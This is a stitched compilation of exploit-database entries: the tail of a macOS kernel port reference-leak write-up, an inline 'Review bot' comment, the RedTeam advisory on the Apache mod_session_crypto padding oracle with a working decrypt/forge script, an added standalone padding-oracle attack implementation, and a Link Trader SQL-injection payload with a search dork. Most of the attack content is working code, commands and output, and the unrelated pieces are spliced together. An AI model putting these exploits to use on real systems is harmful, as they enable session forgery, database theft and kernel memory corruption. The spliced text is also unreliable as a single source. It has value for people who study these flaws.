err = kIOReturnNoResources;
if( !(sym = OSSymbol::withCString( notification_type )))
err = kIOReturnNoResources;
if (matching_size)
{
dict = OSDynamicCast(OSDictionary, OSUnserializeXML(matching, matching_size));
}
else
{
dict = OSDynamicCast(OSDictionary, OSUnserializeXML(matching));
}
if (!dict) {
err = kIOReturnBadArgument;
continue;
}
...
} while( false );
return( err );
This inner function has many failure cases (wrong kernel port, invalid serialized data) which we can easily trigger and these error paths lead
to this inner function not taking ownership of the wake_port argument. However, MIG will only see the return value of the outer internal_io_service_add_notification_ool
which will always return success if we pass a valid ool memory descriptor. This violates ipc_kobject_server's ownership model where success means ownership
was taken of all rights, not just some.
What this leads to is actually quite a nice primitive for constructing an ipc_port_t reference count overflow without leaking any memory.
If we call io_service_add_notification_ool with a valid ool descriptor, but fill it with data that causes OSUnserializeXML to return an error then
we can get that memory freed (via the vm_deallocate call above) but the reference on the wake port will be leaked since ipc_kmsg_free will be called, not
ipc_kmsg_destroy.
If we send this request 0xffffffff times we can cause a ipc_port_t's io_references field to overflow to 0; the next time it's used the ref will go 0 -> 1 -> 0
and the object will be free'd but we'll still have a dangling pointer in our process's ports table.
As well as being a regular kernel UaF this also gives us the opportunity to do all kinds of fun mach port related logic attacks, eg getting send rights to
other task's task ports via our dangling ipc_port_t pointer.
** practicality **
On my 4 year old dual core MBA 5,2 running with two threads this PoC takes around 8 hours after which you should see a kernel panic indicative of a UaF.
Note that there are no resources leaks involved here so you can run it even on very constrained systems like an iPhone and it will work fine,
albeit a bit slowly :)
This code is reachable from all sandboxed environments.
** fixes **
One approach to fixing this issue would be to do something similar to OSObjects which use a saturating reference count and leak the object if the reference count saturates
I fear there are a great number of similar issues so just fixing this once instance may not be enough.
Proof of Concept:
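Review bot: The hunk ends with a bare "Proof of Concept:" line and no link, whereas the OpenSSH write-up earlier in this commit follows the same line with its exploit-database-bin-sploits URL; either the link was dropped or the attachment was not uploaded, and the entry is incomplete until one is added. Separately, the text now combines two Project Zero sources (ids 930 and 926) and quotes two run times, about an hour on a 4-core MacBook Pro and around 8 hours on a dual-core MBA 5,2, without saying which PoC each figure belongs to; attribute each to its source so the two reports are not read as one.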


@ -0,0 +1,376 @@
'''
Advisory: Padding Oracle in Apache mod_session_crypto
During a penetration test, RedTeam Pentesting discovered a Padding
Oracle vulnerability in mod_session_crypto of the Apache web server.
This vulnerability can be exploited to decrypt the session data and even
encrypt attacker-specified data.
Details
=======
Product: Apache HTTP Server mod_session_crypto
Affected Versions: 2.3 to 2.5
Fixed Versions: 2.4.25
Vulnerability Type: Padding Oracle
Security Risk: high
Vendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt
Advisory Status: published
CVE: CVE-2016-0736
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736
Introduction
============
The module mod_session_crypto of the Apache HTTP Server can be used in
conjunction with the modules mod_session and mod_session_cookie to store
session data in an encrypted cookie within the users' browsers. This
avoids server-side session state so that incoming HTTP requests can be
easily distributed amongst a number of application web servers which do
not need to share session state.
More Details
============
The module mod_session_crypto uses symmetric cryptography to encrypt and
decrypt session data and uses mod_session to store the encrypted data in
a cookie (usually called "session") within the user's browser. The
decrypted session is then made available to the application in an
environment variable (in case of a CGI script) or in a custom HTTP
request header. The application can add a custom HTTP response header
(usually "X-Replace-Session") which instructs the HTTP server to replace
the session's content with the value of the header. Detailed
instructions to set up mod_session and mod_session_crypto can be found
in the documentation:
https://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples
The module mod_session_crypto is configured to use either 3DES or AES
with various key sizes, defaulting to AES256. Encryption is handled by
the function "encrypt_string":
modules/session/mod_session_crypto.c
------------------------------------------------------------------------
/**
* Encrypt the string given as per the current config.
*
* Returns APR_SUCCESS if successful.
*/
static apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f,
session_crypto_dir_conf *dconf, const char *in, char **out)
{
[...]
apr_crypto_key_t *key = NULL;
[...]
const unsigned char *iv = NULL;
[...]
/* use a uuid as a salt value, and prepend it to our result */
apr_uuid_get(&salt);
[...]
res = apr_crypto_passphrase(&key, &ivSize, passphrase,
strlen(passphrase),
(unsigned char *) (&salt), sizeof(apr_uuid_t),
*cipher, APR_MODE_CBC, 1, 4096, f, r->pool);
[...]
res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool);
[...]
res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in,
strlen(in), block);
[...]
res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block);
[...]
/* prepend the salt and the iv to the result */
combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t));
memcpy(combined, &salt, sizeof(apr_uuid_t));
memcpy(combined + sizeof(apr_uuid_t), iv, ivSize);
memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen);
/* base64 encode the result */
base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen +
sizeof(apr_uuid_t) + 1)
* sizeof(char));
[...]
return res;
}
------------------------------------------------------------------------
The source code shows that an encryption key is derived from the
configured password and a randomly chosen salt by calling the function
"apr_crypto_passphrase". This function internally uses PBKDF2 to derive
the key. The data is then encrypted and the salt and IV prepended to the
encrypted data. Before returning to the caller, the result is encoded as
base64.
This procedure does not guarantee integrity of the ciphertext, so the
Apache module is unable to detect whether a session sent back to the
server has been tampered with. Depending on the application this often
means that attackers are able to exploit a Padding Oracle vulnerability.
This allows decrypting the session and encrypting arbitrary data chosen
by the attacker.
Proof of Concept
================
The vulnerability can be reproduced as follows. First, the modules
mod_session, mod_session_crypto and mod_session_cookie are enabled and
configured:
------------------------------------------------------------------------
Session On
SessionEnv On
SessionCookieName session path=/
SessionHeader X-Replace-Session
SessionCryptoPassphrase RedTeam
------------------------------------------------------------------------
In addition, CGI scripts are enabled for a folder and the following CGI
script is saved as "status.rb" and is made available to clients:
------------------------------------------------------------------------
#!/usr/bin/env ruby
require 'cgi'
cgi = CGI.new
data = CGI.parse(ENV['HTTP_SESSION'])
if data.has_key? 'username'
puts
puts "your username is %s" % data['username']
exit
end
puts "X-Replace-Session: username=guest&timestamp=" + Time.now.strftime("%s")
puts
puts "not logged in"
------------------------------------------------------------------------
Once the CGI script is correctly set up, the command-line HTTP client curl
can be used to access it:
------------------------------------------------------------------------
$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb
HTTP/1.1 200 OK
Date: Tue, 19 Jan 2016 13:23:19 GMT
Server: Apache/2.4.10 (Ubuntu)
Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ
l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/
Cache-Control: no-cache
Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ
l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/
Transfer-Encoding: chunked
Content-Type: application/x-ruby
not logged in
------------------------------------------------------------------------
The example shows that a new encrypted cookie with the name "session" is
returned, and the response body contains the text "not logged in".
Calling the script again with the cookie just returned reveals that the
username in the session is set to "guest":
------------------------------------------------------------------------
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\
LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \
http://127.0.0.1:8080/cgi-bin/status.rb
your username is guest
------------------------------------------------------------------------
Sending a modified cookie ending in "u=" instead of "U=" will invalidate
the padding at the end of the ciphertext, so the session cannot be
decrypted correctly and is therefore not passed to the CGI script, which
returns the text "not logged in" again:
------------------------------------------------------------------------
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\
LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \
http://127.0.0.1:8080/cgi-bin/status.rb
not logged in
------------------------------------------------------------------------
This verifies the existence of the Padding Oracle vulnerability. The
Python library[1] python-paddingoracle was then used to implement
decrypting the session by exploiting the Padding Oracle vulnerability.
exploit.py
------------------------------------------------------------------------
'''
from paddingoracle import BadPaddingException, PaddingOracle
from base64 import b64encode, b64decode
import requests
class PadBuster(PaddingOracle):
def __init__(self, valid_cookie, **kwargs):
super(PadBuster, self).__init__(**kwargs)
self.wait = kwargs.get('wait', 2.0)
self.valid_cookie = valid_cookie
def oracle(self, data, **kwargs):
v = b64encode(self.valid_cookie+data)
response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb',
cookies=dict(session=v), stream=False, timeout=5, verify=False)
if 'username' in response.content:
logging.debug('No padding exception raised on %r', v)
return
raise BadPaddingException
if __name__ == '__main__':
import logging
import sys
if not sys.argv[2:]:
print 'Usage: [encrypt|decrypt] <session value> <plaintext>'
sys.exit(1)
logging.basicConfig(level=logging.WARN)
mode = sys.argv[1]
session = b64decode(sys.argv[2])
padbuster = PadBuster(session)
if mode == "decrypt":
cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32])
print('Decrypted session:\n%r' % cookie)
elif mode == "encrypt":
key = session[0:16]
plaintext = sys.argv[3]
s = padbuster.encrypt(plaintext, block_size=16)
data = b64encode(key+s[0:len(s)-16])
print('Encrypted session:\n%s' % data)
else:
print "invalid mode"
sys.exit(1)
'''
------------------------------------------------------------------------
This Python script can then be used to decrypt the session:
------------------------------------------------------------------------
$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=
Decrypted session:
b'username=guest&timestamp=1453282205\r\r\r\r\r\r\r\r\r\r\r\r\r'
real 6m43.088s
user 0m15.464s
sys 0m0.976s
------------------------------------------------------------------------
In this sample application, the username and a timestamp are included in
the session data. The Python script can also be used to encrypt a new
session containing the username "admin":
------------------------------------------------------------------------
$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\
RU= username=admin
Encrypted session:
sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY
real 3m38.002s
user 0m8.536s
sys 0m0.512s
------------------------------------------------------------------------
Sending this newly encrypted session to the server shows that the
username is now "admin":
------------------------------------------------------------------------
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\
zmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb
your username is admin
------------------------------------------------------------------------
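The two operations the script above delegates to python-paddingoracle, recovery of the intermediate value D_k(C) one byte at a time and right-to-left forging of a chosen plaintext, as an added self-contained example that is not part of the advisory or of the library. It substitutes a constructed toy Feistel block cipher for AES (the attack never looks inside the cipher, only at the padding verdict), models the session as IV||ciphertext without the 16-byte leading value the script carries through unchanged, and replaces the HTTP request to status.rb with a local oracle function; key, IV and plaintexts are constructed.

```python
import hashlib
import os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Constructed toy block cipher: 4-round Feistel network with a SHA-256 round
# function. NOT secure; it stands in for AES so the example runs offline.
def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    padded = pkcs7_pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return pkcs7_unpad(out)

def make_oracle(key):
    """Local stand-in for status.rb: True iff (iv, ct) decrypts with valid padding."""
    def oracle(iv, ct):
        try:
            cbc_decrypt(key, iv, ct)
            return True
        except ValueError:
            return False
    return oracle

def recover_intermediate(oracle, block):
    """Recover D_k(block) byte by byte, last byte first, using only the oracle."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        probe = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):      # known bytes are set to decrypt to `pad`
            probe[j] = inter[j] ^ pad
        for guess in range(256):
            probe[pos] = guess
            if not oracle(bytes(probe), block):
                continue
            if pos == BLOCK - 1:             # rule out a \x02\x02 (etc.) false positive
                alt = bytearray(probe)
                alt[pos - 1] ^= 0xFF
                if not oracle(bytes(alt), block):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle never accepted; not a padding oracle?")
    return bytes(inter)

def po_decrypt(oracle, iv, ct):
    """'decrypt' mode: plaintext block i = D_k(C_i) XOR C_(i-1)."""
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(recover_intermediate(oracle, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return pkcs7_unpad(out)

def po_encrypt(oracle, plaintext):
    """'encrypt' mode: forge (iv, ct) for plaintext without the key, right to left."""
    padded = pkcs7_pad(plaintext)
    blocks = [padded[i:i + BLOCK] for i in range(0, len(padded), BLOCK)]
    ct = bytes(BLOCK)                        # the final ciphertext block is arbitrary
    for block in reversed(blocks):
        # pick the preceding block so that D_k(next) XOR preceding == wanted plaintext
        ct = xor(recover_intermediate(oracle, ct[:BLOCK]), block) + ct
    return ct[:BLOCK], ct[BLOCK:]            # (iv, ciphertext)

def demo():
    key, iv = os.urandom(16), os.urandom(16)   # server secret; attacker never sees key
    session = cbc_encrypt(key, iv, b"username=guest&timestamp=1453282205")
    oracle = make_oracle(key)
    recovered = po_decrypt(oracle, iv, session)
    forged_iv, forged_ct = po_encrypt(oracle, b"username=admin")
    return recovered, cbc_decrypt(key, forged_iv, forged_ct)

if __name__ == "__main__":
    print(demo())
```

Each byte costs at most 256 oracle queries plus one confirmation query for the last byte of a block, which is why the script above needs minutes over HTTP while this local version finishes in under a second; the throttling in the script's `wait` parameter is the only part of the attack that depends on the transport.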
Workaround
==========
Use a different means to store the session, e.g. in a database by using
mod_session_dbd. With server-side storage the cookie only carries a session
identifier, so there is no ciphertext for the client to tamper with.
Fix
===
Update to Apache HTTP Server version 2.4.25 (see [2]).
Security Risk
=============
Applications which use mod_session_crypto usually store sensitive values
in the session and rely on an attacker's inability to decrypt or modify
the session. Successful exploitation of the Padding Oracle vulnerability
subverts this mechanism and allows an attacker to construct sessions with
arbitrary attacker-specified content. Depending on the application this may
completely subvert the application's security. Therefore, this
vulnerability poses a high risk.
Timeline
========
2016-01-11 Vulnerability identified
2016-01-12 Customer approved disclosure to vendor
2016-01-12 CVE number requested
2016-01-20 Vendor notified
2016-01-22 Vendor confirmed the vulnerability
2016-02-03 Vendor provided patch
2016-02-04 Apache Security Team assigned CVE number
2016-03-03 Requested status update from vendor, no response
2016-05-02 Requested status update from vendor, no response
2016-07-14 Requested status update and roadmap from vendor
2016-07-21 Vendor confirms working on a new release and inquires whether the
           patch fixes the vulnerability
2016-07-22 RedTeam confirms
2016-08-24 Requested status update from vendor
2016-08-29 Vendor states that there is no concrete timeline
2016-12-05 Vendor announces a release
2016-12-20 Vendor released fixed version
2016-12-23 Advisory released
References
==========
[1] https://github.com/mwielgoszewski/python-paddingoracle
[2] http://httpd.apache.org/security/vulnerabilities_24.html
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only a few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
'''

|___________________________________________________|
|
| Link Trader (lnkid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : http://www.iq-ty.com
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://www.ezonescripts.com/scripts/sls/linktrader.php
|
| DorK : inurl:ratelink.php?lnkid=
|___________________________________________________|
Exploit:
www.[target].com/Script/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/*